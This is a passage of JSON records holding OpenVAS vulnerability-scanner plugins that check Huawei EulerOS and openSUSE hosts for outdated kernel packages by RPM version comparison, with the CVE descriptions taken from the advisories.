functionality.(CVE-2015-5364)\n\nA flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.(CVE-2015-5366)\n\nA cross-boundary flaw was discovered in the Linux kernel software raid driver. The driver accessed a disabled bitmap where only the first byte of the buffer was initialized to zero. This meant that the rest of the request (up to 4095 bytes) was left and copied into user space. An attacker could use this flaw to read pr ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-02-05T16:37:44", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1530)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-14051", "CVE-2018-13053", "CVE-2017-15299", "CVE-2018-10880", "CVE-2017-7616", "CVE-2014-4157", "CVE-2017-9984", "CVE-2016-5696", "CVE-2017-14106", "CVE-2017-16533", "CVE-2014-4654", "CVE-2015-8956", "CVE-2016-9588", "CVE-2015-7566", "CVE-2018-5750", "CVE-2018-14611", "CVE-2013-6380", "CVE-2017-15868", "CVE-2015-2041", "CVE-2014-9585"], "modified": "2020-02-05T00:00:00", "id": "OPENVAS:1361412562311220191530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191530", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1530\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-6380\", \"CVE-2014-4157\", \"CVE-2014-4654\", \"CVE-2014-9585\", \"CVE-2015-2041\", \"CVE-2015-7566\", \"CVE-2015-8956\", \"CVE-2016-5696\", \"CVE-2016-9588\", \"CVE-2017-14051\", \"CVE-2017-14106\", \"CVE-2017-15299\", \"CVE-2017-15868\", \"CVE-2017-16533\", \"CVE-2017-7616\", \"CVE-2017-9984\", \"CVE-2018-10880\", \"CVE-2018-13053\", \"CVE-2018-14611\", \"CVE-2018-5750\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:06:13 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1530)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1530\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1530\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1530 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The acpi_smbus_hc_add function in drivers/acpi/sbshc.c in the Linux kernel through 4.14.15 allows local users to obtain sensitive address information by reading dmesg data from an SBS HC printk call.(CVE-2018-5750)\n\nAn issue was discovered in the btrfs filesystem code in the Linux kernel. A use-after-free is possible in try_merge_free_space() when mounting a crafted btrfs image due to a lack of chunk type flag checks in btrfs_check_chunk_valid() in the fs/btrfs/volumes.c function. This could lead to a denial of service or other unspecified impact.(CVE-2018-14611)\n\nA flaw was found in the way the Linux kernel visor driver handles certain invalid USB device descriptors. The driver assumes that the device always has at least one bulk OUT endpoint. By using a specially crafted USB device (without a bulk OUT endpoint), an unprivileged user with physical access could trigger a kernel NULL-pointer dereference and cause a system panic (denial of service).(CVE-2015-7566)\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network.(CVE-2016-5696)\n\nIt was found that the Bluebooth Network Encapsulation Protocol (BNEP) implementation did not validate the type of second socket passed to the BNEPCONNADD ioctl(), which could lead to memory corruption. A local user with the CAP_NET_ADMIN capability can use this for denial of service (crash or data corruption) or possibly for privilege escalation. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we feel it is unlikely.(CVE-2017-15868)\n\nA vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).(CVE-2017-15299)\n\nThe rfcomm_sock_bind function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 4.2 allows local users to obtain sensitive information or cause a denial of service (NULL pointer dereference) via vectors involving a bind system call on a Bluetooth RFCOMM socket.(CVE-2015-8956)\n\narch/mips/include/asm/thread_info.h in the Linux kernel before 3.14.8 on the MIPS platform does not configure _TIF_SECCOMP checks on the fast system-call path, which allows loca ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:56:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2144-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-5244", "CVE-2016-2543", "CVE-2015-3288", "CVE-2016-4913", "CVE-2016-4581", "CVE-2016-2053", "CVE-2016-3689", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-3139", "CVE-2016-4486", "CVE-2016-2186", "CVE-2014-9904", "CVE-2016-2187", "CVE-2015-6526", "CVE-2016-2547", "CVE-2016-3156", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-4569", "CVE-2016-2184", "CVE-2015-8830", "CVE-2012-6701", "CVE-2016-3951", "CVE-2016-3137", "CVE-2016-5829", "CVE-2016-4485", "CVE-2016-4997", "CVE-2016-2545", "CVE-2016-4482", "CVE-2016-3136", "CVE-2016-3138", "CVE-2016-3140", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-4578", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-4805", "CVE-2013-7446", "CVE-2016-4470", "CVE-2015-8709", "CVE-2016-4565", "CVE-2016-4580", "CVE-2016-3672", "CVE-2015-8785", "CVE-2016-3134", "CVE-2016-2188"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851386", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851386\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-25 05:40:38 +0200 (Thu, 25 Aug 2016)\");\n script_cve_id(\"CVE-2012-6701\", \"CVE-2013-7446\", \"CVE-2014-9904\", \"CVE-2015-3288\",\n \"CVE-2015-6526\", \"CVE-2015-7566\", \"CVE-2015-8709\", \"CVE-2015-8785\",\n \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0758\",\n \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-2184\", \"CVE-2016-2185\",\n \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2188\", \"CVE-2016-2384\",\n \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\",\n \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\",\n \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\",\n \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\",\n \"CVE-2016-3672\", \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4470\",\n \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4565\",\n \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4581\",\n \"CVE-2016-4805\", \"CVE-2016-4913\", \"CVE-2016-4997\", \"CVE-2016-5244\",\n \"CVE-2016-5829\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2144-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE 13.2 kernel was updated to fix various bugs and security\n issues.\n\n The following security bugs were fixed:\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does\n not allow it. This could have lead to local privilege escalation when\n ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in fs/isofs/rock.c\n in the Linux kernel mishandles NM (aka alternate name) entries\n containing \\0 characters, which allowed local users to obtain sensitive\n information from kernel memory or possibly have unspecified other impact\n via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not properly initialize\n a certain data structure, which allowed attackers to obtain sensitive\n information from kernel stack memory via an X.25 Call Request\n (bnc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers\n in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2187: The gtco_probe function in drivers/input/tablet/gtco.c in\n the Linux kernel allowed physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system crash) via a\n crafted endpoints value in a USB device descriptor (bnc#971919 971944).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c\n in the Linux kernel did not initialize a certain data structure, which\n allowed local users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401\n bsc#978445).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relies on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bnc#979548\n bsc#980363).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in arch/x86/mm/mmap.c\n in the Linux kernel did not properly randomize the legacy base address,\n which made it easier for local users to defeat the intended restrictions\n on the ADDR_NO_RANDOMIZE flag, and bypass the ASLR protection mechanism\n for a setuid or ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2144-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch\", rpm:\"bbswitch~0.8~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-debugsource\", rpm:\"bbswitch-debugsource~0.8~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-default\", rpm:\"bbswitch-kmp-default~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-default-debuginfo\", rpm:\"bbswitch-kmp-default-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-desktop\", rpm:\"bbswitch-kmp-desktop~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-desktop-debuginfo\", rpm:\"bbswitch-kmp-desktop-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-xen\", rpm:\"bbswitch-kmp-xen~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-xen-debuginfo\", rpm:\"bbswitch-kmp-xen-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop\", rpm:\"cloop~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debuginfo\", rpm:\"cloop-debuginfo~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debugsource\", rpm:\"cloop-debugsource~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default\", rpm:\"cloop-kmp-default~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default-debuginfo\", rpm:\"cloop-kmp-default-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop\", rpm:\"cloop-kmp-desktop~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop-debuginfo\", rpm:\"cloop-kmp-desktop-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen-debuginfo\", rpm:\"cloop-kmp-xen-debuginfo~2.639_k3.16.7_42~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash\", rpm:\"crash~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debuginfo\", rpm:\"crash-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debugsource\", rpm:\"crash-debugsource~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic\", rpm:\"crash-eppic~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic-debuginfo\", rpm:\"crash-eppic-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore\", rpm:\"crash-gcore~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore-debuginfo\", rpm:\"crash-gcore-debuginfo~7.0.8~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default\", rpm:\"crash-kmp-default~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default-debuginfo\", rpm:\"crash-kmp-default-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop\", rpm:\"crash-kmp-desktop~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop-debuginfo\", rpm:\"crash-kmp-desktop-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen\", rpm:\"crash-kmp-xen~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen-debuginfo\", rpm:\"crash-kmp-xen-debuginfo~7.0.8_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop\", rpm:\"hdjmod-kmp-desktop~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop-debuginfo\", rpm:\"hdjmod-kmp-desktop-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k3.16.7_42~18.21.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.23~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop\", rpm:\"ipset-kmp-desktop~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop-debuginfo\", rpm:\"ipset-kmp-desktop-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.23_k3.16.7_42~20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.16.7~42.1\", rls:\"openSUSE13.2\"))) {\n report += 